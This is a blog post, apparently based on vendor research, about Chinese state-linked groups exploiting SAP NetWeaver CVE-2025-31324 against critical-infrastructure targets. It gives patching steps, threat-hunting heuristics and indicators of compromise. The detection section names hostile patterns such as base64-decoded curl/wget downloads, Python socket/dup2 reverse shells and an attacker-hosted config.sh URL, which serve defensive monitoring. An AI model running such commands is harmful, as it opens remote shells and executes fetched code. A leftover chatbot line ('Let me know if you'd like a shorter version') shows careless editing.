Chinese Hackers Targeting a Critical SAP NetWeaver Vulnerability

Written By Christopher Blackwell

A major security flaw in SAP NetWeaver is under active exploitation by several Chinese state-linked hacking groups, and they’re going after some pretty high-value targets—ranging from U.S. oil companies to U.K. water utilities.

Researchers at cybersecurity firm EclecticIQ revealed that attackers are using CVE-2025-31324, a serious bug that lets them upload malicious files and run code remotely—no login required. Once in, they can take over systems and stay there as long as they like.

The targets are as serious as it gets: natural gas networks and water utilities in the U.K., medical device manufacturers and energy companies in the U.S., and financial ministries in Saudi Arabia.

The researchers discovered a server 15.204.56[.]106 controlled by the attackers, which had a treasure trove of event logs showing exactly what systems had been hacked. The logs confirmed successful breaches and even hinted at who’s next on the list.

EclecticIQ linked the activity to three China-based groups known as UNC5221, UNC5174, and CL-STA-0048. These groups have a history of targeting vulnerable public-facing systems like IIS, Apache Tomcat, and MS-SQL to install web shells and backdoors such as PlugX.

But they’re not the only ones. A yet-unnamed China-linked actor is also scanning the internet en masse for vulnerable SAP NetWeaver systems.

The attackers left behind some telling files:

  • “CVE-2025-31324-results.txt” logs 581 hacked SAP systems with web shells installed.

  • “服务数据_20250427_212229.txt” lists 800 more SAP NetWeaver domains they might go after next.

“These files give us a rare look into both the systems that have already been compromised and those being lined up for future attacks,” said EclecticIQ’s Arda Büyükkaya.

What the Hackers Are Doing Once They Get In

Once they break into a system using the NetWeaver vulnerability, the attackers install two different web shells to keep access and run commands remotely. Each group seems to have its own playbook:

  • CL-STA-0048 tried to create a reverse shell that connects back to another attacker-controlled IP.

  • UNC5221 dropped a Rust-based tool called KrustyLoader, which can install more malware, maintain persistence, and run commands.

  • UNC5174 used a loader called SNOWLIGHT that downloads a Go-based remote access tool called VShell and another backdoor named GOREVERSE.

"China-linked APTs are highly likely to continue targeting internet-exposed enterprise applications and edge devices to establish long-term strategic and persistence access to critical infrastructure networks globally," Büyükkaya said.

"Their focus on widely used platforms like SAP NetWeaver is a strategic move, as these systems are deeply integrated into enterprise environments and often host unpatched vulnerabilities."

More Bad News

On top of all this, researchers also found another serious bug in SAP NetWeaver—this one in the Visual Composer Metadata Uploader. Tracked as CVE-2025-42999 with a CVSS score of 9.1, it’s a deserialization issue that could let a privileged user upload malicious content.

Meanwhile, SAP-focused security firm Onapsis says attacker activity around these vulnerabilities is still heating up, even as some of the original attackers appear to have gone quiet. Others are jumping in to exploit the web shells that were already planted.

If your organization uses SAP NetWeaver, update immediately. These vulnerabilities are being actively exploited, and the attackers aren’t being subtle about it. Leaving these systems unpatched is like leaving the front door wide open.

Let me know if you'd like a shorter version, or one tailored for executives, engineers, or a newsletter audience.

Prevention

  • Patch ASAP: Install SAP Security Note #3594142 on all systems running SAP NetWeaver 7.1x with VCFRAMEWORK.

  • Workaround (if patching isn't an option): Follow the guidance in SAP Note #3593336, which recommends completely removing sap.com/devserver_metadataupload_ear.

  • Limit Access: Make sure the /developmentserver/metadatauploader path is only accessible from internal, authenticated IP ranges.

  • Strengthen Network Defenses: Use your firewall or web application firewall (WAF) to block any unauthenticated or public access to the vulnerable endpoint.

Threat Hunting & Detection

File-system IOC sweep (Linux & Windows SAP hosts)

  • Inspect for unauthorised web-executable files in the Visual Composer paths:

    • …/irj/servlet_jsp/irj/work 

    • …/irj/servlet_jsp/irj/work/sync

    • …/irj/servlet_jsp/irj/root

    • Automate with:
      find . -type f \( -name "*.jsp" -o -name "*.java" -o -name "*.class" \) -ls

    • Flag any of the following:

      • Known webshells (helper.jsp, cache.jsp, usage.jsp, .webhelper.jsp, forwardsap.jsp, 404_error.jsp, .h.jsp)

      • Randomised names:

        • 8-character pattern [a-z]{8}.jsp

        • Variable-length alphanumerics ≤ 10 chars

Web-access log analytics

  • Alert on unauthenticated calls to /developmentserver/metadatauploader

  • Highlight POST, GET, or HEAD requests with Content-Type: application/octet-streamuploading .jsp|.java|.class.

  • Trace hits on /irj/*.jsp?cmd= to surface webshell command execution.

Process & command-line heuristics (EDR/Sysmon)

  • bash or sh processes containing Base64 decode plus curl/wget:
    process == "bash" && command_includes("base64, -d").

  • curl or wget writing to /tmp (or %TEMP% on Windows) then chmod/execute.

  • Python one-liners opening sockets or duplicating FDs:
    process == "python*" && command_includes("socket") && command_includes("dup2").

Network & proxy monitoring

  • Outbound connections from SAP servers to campaign infra:
    • Domains *.s3.amazonaws.com, *.trycloudflare.com, *.aliyuncs.com.

  • Detect large uploads or TLS tunnels initiated shortly after metadatauploader hits.

Authentication & component validation

  • Query NetWeaver System Info for VCFRAMEWORK; flag any instance where version is < patched build in SAP Note 3594142.

  • Hunt for successful logins that occur immediately after webshell activity or from atypical source IPs.


Indicators of Compromise (IOC)

Uncategorized China‑Nexus actor (internet‑wide CVE‑2025‑31324 scanning): 

  • 15.204.56[.]106 (opendir server hosting logs, web‑shells, target lists)

o   4c9e60cc73e87da4cadc51523690d67549de4902e880974bfacf7f1a8dc40d7d

o   63aa0c6890ec5c16b872fb6d070556447cd707dfba185d32a2c10c008dbdbcdd

 CL‑STA‑0048 (reverse‑shell & DNS‑beaconing)

  • 43.247.135[.]53  (resolves to sentinelones.com, TCP 10443)

  • aaa.ki6zmfw3ps8q14rfbfczfq5qkhq8e12q.oastify.com

    • 54.77.139[.]23

    • 3.248.33[.]252

UNC5221 (KrustyLoader ➞ Sliver chain)

  • applr-malbbal.s3.ap-northeast-2.amazonaws[.]com

o   f92d0cf4d577c68aa615797d1704f40b14810d98b48834b241dd5c9963e113ec

  • abode-dashboard-media.s3.ap-south-1.amazonaws[.]com  (also seen in earlier 2024 ops)

o   47ff0ae9220a09bfad2a2fb1e2fa2c8ffe5e9cb0466646e2a940ac2e0cf55d04

o   3f14dc65cc9e35989857dc1ec4bb1179ab05457f2238e917b698edb4c57ae7ce

o   91f66ba1ad49d3062afdcc80e54da0807207d80a1b539edcdbd6e1bf99e7a2ca

  • brandnav-cms-storage.s3.amazonaws[.]com

o   c71da1dfea145798f881afd73b597336d87f18f8fd8f9a7f524c6749a5c664e4

o   b8e56de3792dbd0f4239b54cfaad7ece3bd42affa4fbbdd7668492de548b5df8

o   0c2c8280701706e0772cb9be83502096e94ad4d9c21d576db0bc627e1e84b579

o   5f3d1f17033d85b85f3bd5ae55cb720e53b31f1679d52986c8d635fd1ce0c08a

 

UNC5174 (SNOWLIGHT ➞ VShell chain & GOREVERSE) 

  • 103.30.76[.]206  (TCP 443 used by SNOWLIGHT handshake)

o   2dcbb4138f836bb5d7bc7d8101d3004848c541df6af997246d4b2a252f29d51a

o   00920e109f16fe61092e70fca68a5219ade6d42b427e895202f628b467a3d22e

o   b9533ce8e428f16f3d0e1946f19a6f756ff11a532d0b7e61ae402837f46c678e

  • ocr-freespace.oss-cn-beijing.aliyuncs.com/2025/config.sh (GOREVERSE)

o   888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef

o   5e24b41a0bd076ec2b4e49e66daac94396c6180d00a45bcd7f4342a385fa1eed

 

IP Address Seen in SAP NetWeaver Intrusion Targeting Victims:

45[.]155[.]222[.]14

15[.]204[.]56[.]106

159[.]65[.]34[.]242

138[.]68[.]61[.]82

192[.]243[.]115[.]175

107[.]175[.]77[.]118

15[.]188[.]246[.]198

138[.]197[.]40[.]133

43[.]247[.]135[.]53

23[.]95[.]123[.]5

215[.]204[.]56[.]106

27[.]25[.]148[.]183

65[.]20[.]81[.]172

3[.]125[.]102[.]39

212[.]11[.]64[.]225

130[.]185[.]118[.]247

212[.]192[.]15[.]213

52[.]172[.]31[.]130

149[.]62[.]46[.]132

196[.]251[.]85[.]31

162[.]248[.]53[.]119

103[.]30[.]76[.]206

206[.]237[.]1[.]201

141[.]164[.]35[.]53

107[.]174[.]81[.]24

208[.]76[.]55[.]39

52[.]185[.]157[.]28

65[.]49[.]235[.]210

185[.]143[.]222[.]215

185[.]165[.]169[.]31

46[.]29[.]161[.]198

62[.]234[.]24[.]38

64[.]233[.]180[.]99

45[.]77[.]119[.]13

23[.]227[.]196[.]204

184[.]174[.]96[.]39

96[.]9[.]124[.]89

156[.]238[.]224[.]227

153[.]92[.]4[.]236

45[.]61[.]137[.]162

64[.]95[.]11[.]95

142[.]202[.]4[.]28

154[.]37[.]221[.]237

Christopher Blackwell
Next

External Pentesting with PTES Methodology